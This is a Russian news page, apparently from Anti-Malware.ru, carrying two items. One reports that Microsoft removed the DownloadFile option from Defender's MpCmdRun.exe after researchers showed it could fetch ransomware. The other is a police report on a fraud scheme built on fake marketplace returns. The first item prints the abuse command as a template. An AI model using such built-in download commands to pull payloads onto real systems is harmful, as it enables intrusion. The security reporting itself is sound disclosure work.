Microsoft убрала возможность загружать файлы через Windows Defender

Microsoft убрала возможность загружать файлы через Windows Defender

Microsoft убрала возможность загружать файлы через Windows Defender

Microsoft убрала возможность загружать файлы посредством Microsoft Defender после того, как эксперты продемонстрировали способ загрузки вредоносных программ в Windows с помощью встроенного антивируса.

В начале месяца специалисты в области кибербезопасности указали на изъян в некоторых функциях Microsoft Defender. Например, защитная программа позволяла загружать в систему произвольные файлы.

Само собой, эксперты обеспокоились наличием потенциальной лазейки для злоумышленников, которые могут использовать функцию Microsoft Defender в атаках. Чтобы загрузить любой файл на компьютер пользователя, достаточно было запустить утилиту MpCmdRun.exe с аргументом «DownloadFile». Пример:

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

 

В ходе тестирования этой возможности специалистам удалось загрузить в систему файл шифровальщика, что говорит о вполне рабочем векторе атаки.

С выходом Windows Defender Antimalware Client версии 4.18.2009.2-0 Microsoft решила убрать опасную функцию. Теперь при попытке загрузить файл через MpCmdRun.exe с вышеупомянутым аргументом пользователи будут наблюдать ошибку.

Владелец ПВЗ чуть не стал миллионером на фиктивных возвратах

Владелец нескольких пунктов выдачи заказов (ПВЗ) в Красноярске наладил торговлю офисной бумагой, которую заказывал с постоплатой, а затем присваивал через фиктивный возврат. Такой побочный бизнес приносил ему крупный доход, однако правоохранительные органы квалифицировали схему как мошенничество в особо крупном размере.

О завершении предварительного расследования по делу, которым занимались сотрудники специализированного отдела МУ МВД России «Красноярское», сообщила официальный представитель МВД России Ирина Волк. Фигурантом стал житель Красноярска, владевший несколькими ПВЗ в разных районах города.

«По версии следствия, злоумышленник арендовал несколько телефонных номеров и с их помощью с октября 2024 по март 2025 года покупал на маркетплейсе товары с постоплатой на адреса своих ПВЗ. В основном это была офисная бумага в больших объёмах и другие ликвидные позиции, — приводит подробности представитель МВД. — Когда срок хранения доставленного подходил к концу, аферист оформлял возврат, но заказы оставлял себе и в дальнейшем сбывал по объявлениям в интернете. В общей сложности были похищены свыше пяти тысяч коробок офисной бумаги и другие товары на сумму более 10 миллионов рублей».

Материалы дела по ч. 4 ст. 159 УК РФ (мошенничество в особо крупном размере) переданы в Ленинский районный суд Красноярска для рассмотрения по существу. Обвиняемому может грозить до 10 лет лишения свободы.

RSS: Новости на портале Anti-Malware.ru